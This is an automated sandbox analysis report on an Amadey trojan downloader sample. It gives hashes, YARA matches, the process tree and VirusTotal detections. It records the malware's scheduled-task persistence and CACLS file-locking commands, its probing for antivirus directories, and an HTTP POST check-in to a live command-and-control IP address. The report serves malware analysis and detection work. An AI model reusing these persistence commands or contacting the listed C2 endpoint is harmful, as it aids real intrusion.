Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Feb. 27, 2023, 9:24 a.m.	Feb. 27, 2023, 9:28 a.m.

Size	227.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`17a8f85f937d8106c020a366d7c6ccb4`
SHA256	`3f3dadd2a5177fb918eabacc6a433d46f1975dd9c18cc0a7b63e09669625b800`
CRC32	`07C07473`
ssdeep	`3072:up/r/XWcqLhrksdsUrPYdBqaTl723DSVhdu1SAA8YcG9lKVf1svV+NhcmEx:uNzGcU9LPGQaTASlu1STVJGMV+4`
PDB Path	D:\Mktmp\Amadey\Release\Amadey.pdb
Yara	Malicious_Packer_Zero - Malicious Packer OS_Processor_Check_Zero - OS Processor Check UPX_Zero - UPX packed file IsPE32 - (no description) PE_Header_Zero - PE File Signature Malicious_Library_Zero - Malicious_Library

Amadey.exe "C:\Users\test22\AppData\Local\Temp\Amadey.exe"
872
- mnolyk.exe "C:\Users\test22\AppData\Local\Temp\1eb2f325ea\mnolyk.exe"
  1440
  - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\1eb2f325ea\mnolyk.exe" /F
    2124
  - cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "test22:N"&&CACLS "mnolyk.exe" /P "test22:R" /E&&echo Y|CACLS "..\1eb2f325ea" /P "test22:N"&&CACLS "..\1eb2f325ea" /P "test22:R" /E&&Exit
    2184
    - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      2260
    - cacls.exe CACLS "mnolyk.exe" /P "test22:N"
      2300
    - cacls.exe CACLS "mnolyk.exe" /P "test22:R" /E
      2376
    - cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      2424
    - cacls.exe CACLS "..\1eb2f325ea" /P "test22:N"
      2460
    - cacls.exe CACLS "..\1eb2f325ea" /P "test22:R" /E
      2516

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
193.42.33.28	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49174 -> 193.42.33.28:80	2027700	ET MALWARE Amadey CnC Check-In	Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Feb. 27, 2023, 9:24 a.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (50 out of 79 events)

Time & API	Arguments	Status	Return
WriteConsoleW Feb. 27, 2023, 9:24 a.m.	buffer: SUCCESS: The scheduled task "mnolyk.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: Y console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: N console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW Feb. 27, 2023, 9:24 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\1eb2f325ea\mnolyk.exe console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW Feb. 27, 2023, 9:24 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\1eb2f325ea\mnolyk.exe console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Feb. 27, 2023, 9:24 a.m.	buffer: r console_handle: 0x00000007	1	1

This executable has a PDB path (1 event)

pdb_path

D:\Mktmp\Amadey\Release\Amadey.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Feb. 27, 2023, 9:24 a.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

POST method with no referer header, POST method with no useragent header, Connection to IP address

suspicious_request

POST http://193.42.33.28/0bjdn2Z/index.php

Performs some HTTP requests (1 event)

request

POST http://193.42.33.28/0bjdn2Z/index.php

Sends data using the HTTP POST Method (1 event)

request

POST http://193.42.33.28/0bjdn2Z/index.php

Creates a suspicious process (4 events)

cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\1eb2f325ea\mnolyk.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\1eb2f325ea\mnolyk.exe" /F
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "mnolyk.exe" /P "test22:N"&&CACLS "mnolyk.exe" /P "test22:R" /E&&echo Y\|CACLS "..\1eb2f325ea" /P "test22:N"&&CACLS "..\1eb2f325ea" /P "test22:R" /E&&Exit
cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo Y"

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Feb. 27, 2023, 9:24 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1eb2f325ea\mnolyk.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1eb2f325ea\mnolyk.exe	1	1
ShellExecuteExW Feb. 27, 2023, 9:24 a.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\1eb2f325ea\mnolyk.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW Feb. 27, 2023, 9:24 a.m.	show_type: 0 filepath_r: cmd parameters: /k echo Y\|CACLS "mnolyk.exe" /P "test22:N"&&CACLS "mnolyk.exe" /P "test22:R" /E&&echo Y\|CACLS "..\1eb2f325ea" /P "test22:N"&&CACLS "..\1eb2f325ea" /P "test22:R" /E&&Exit filepath: cmd	1	1

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\1eb2f325ea\mnolyk.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\1eb2f325ea\mnolyk.exe" /F

Communicates with host for which no DNS query was performed (1 event)

host

193.42.33.28

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Installs itself for autorun at Windows startup (2 events)

cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\1eb2f325ea\mnolyk.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\1eb2f325ea\mnolyk.exe" /F

Uses suspicious command line tools or Windows utilities (6 events)

cmdline	CACLS "mnolyk.exe" /P "test22:R" /E
cmdline	CACLS "..\1eb2f325ea" /P "test22:R" /E
cmdline	CACLS "..\1eb2f325ea" /P "test22:N"
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "mnolyk.exe" /P "test22:N"&&CACLS "mnolyk.exe" /P "test22:R" /E&&echo Y\|CACLS "..\1eb2f325ea" /P "test22:N"&&CACLS "..\1eb2f325ea" /P "test22:R" /E&&Exit
cmdline	cmd /k echo Y\|CACLS "mnolyk.exe" /P "test22:N"&&CACLS "mnolyk.exe" /P "test22:R" /E&&echo Y\|CACLS "..\1eb2f325ea" /P "test22:N"&&CACLS "..\1eb2f325ea" /P "test22:R" /E&&Exit
cmdline	CACLS "mnolyk.exe" /P "test22:N"

File has been identified by 46 AntiVirus engines on VirusTotal as malicious (46 events)

Lionic	Trojan.Win32.Deyma.4!c
MicroWorld-eScan	Gen:Variant.Doina.46294
FireEye	Generic.mg.17a8f85f937d8106
CAT-QuickHeal	Trojan.GenericRI.S29487073
ALYac	Gen:Variant.Doina.46294
Malwarebytes	Trojan.Injector
Sangfor	Suspicious.Win32.Save.a
Alibaba	TrojanDownloader:Win32/Amadey.4c1fc12b
CrowdStrike	win/malicious_confidence_100% (W)
Arcabit	Trojan.Doina.DB4D6
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	a variant of Win32/TrojanDownloader.Amadey.A
Cynet	Malicious (score: 100)
APEX	Malicious
Paloalto	generic.ml
Kaspersky	HEUR:Trojan-Downloader.Win32.Deyma.gen
BitDefender	Trojan.GenericKD.65663856
Avast	Win32:BotX-gen [Trj]
Tencent	Win32.Trojan-Downloader.Deyma.Sgil
Emsisoft	Gen:Variant.Doina.46294 (B)
DrWeb	Trojan.DownLoader45.45654
VIPRE	Gen:Variant.Doina.46294
TrendMicro	TrojanSpy.Win32.REDLINE.YXDBYZ
McAfee-GW-Edition	BehavesLike.Win32.Generic.dh
Trapmine	suspicious.low.ml.score
Sophos	ML/PE-A
SentinelOne	Static AI - Malicious PE
Webroot	W32.Malware.Gen
Avira	HEUR/AGEN.1255088
Microsoft	Trojan:Win32/Amadey!ic
ViRobot	Trojan.Win.Z.Doina.232448
GData	Trojan.GenericKD.65663856
Google	Detected
AhnLab-V3	Trojan/Win.Generic.C5234847
McAfee	GenericRXVE-CX!17A8F85F937D
MAX	malware (ai score=89)
TrendMicro-HouseCall	TROJ_GEN.R002C0DBO23
Rising	Downloader.Amadey!8.125AC (TFE:5:kxJFejq2FbQ)
Ikarus	Trojan-Downloader.Win32.Amadey
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	W32/Injector.EGTS!tr
BitDefenderTheta	Gen:NN.ZexaF.36276.ouW@amDXACni
AVG	Win32:BotX-gen [Trj]
Cybereason	malicious.f937d8
Panda	Trj/Genetic.gen

Amadey.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All